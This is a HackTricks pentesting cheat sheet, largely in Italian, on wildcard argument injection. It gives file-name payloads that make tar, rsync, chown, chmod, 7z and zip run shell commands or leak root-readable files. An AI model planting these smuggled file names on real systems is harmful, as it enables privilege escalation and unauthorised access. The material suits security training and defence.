Wildcards Spare tricks

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

chown, chmod

Puoi indicare quale proprietario del file e quali permessi vuoi copiare per il resto dei file

touch "--reference=/my/own/path/filename"

Puoi sfruttare questo usando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (attacco combinato) Ulteriori informazioni in https://www.exploit-db.com/papers/33930

Tar

Esegui comandi arbitrari:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Puoi sfruttare questo usando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (attacco tar) Ulteriori informazioni in https://www.exploit-db.com/papers/33930

Rsync

Esegui comandi arbitrari:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Puoi sfruttare questo usando https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_attacco rsync) Ulteriori informazioni in https://www.exploit-db.com/papers/33930

7z

In 7z anche usando -- prima di * (nota che -- significa che l'input successivo non può essere trattato come parametri, quindi solo percorsi di file in questo caso) puoi causare un errore arbitrario per leggere un file, quindi se un comando come il seguente viene eseguito da root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

E puoi creare file nella cartella in cui viene eseguito questo, potresti creare il file @root.txt e il file root.txt come un symlink al file che vuoi leggere:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Poi, quando 7z viene eseguito, tratterà root.txt come un file contenente l'elenco dei file che dovrebbe comprimere (questo è ciò che indica l'esistenza di @root.txt) e quando 7z legge root.txt, leggerà /file/you/want/to/read e poiché il contenuto di questo file non è un elenco di file, genererà un errore mostrando il contenuto.

Maggiori informazioni nei Write-up della box CTF di HackTheBox.

Zip

Eseguire comandi arbitrari:

zip name.zip files -T --unzip-command "sh -c whoami"

Impara e pratica Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Last updated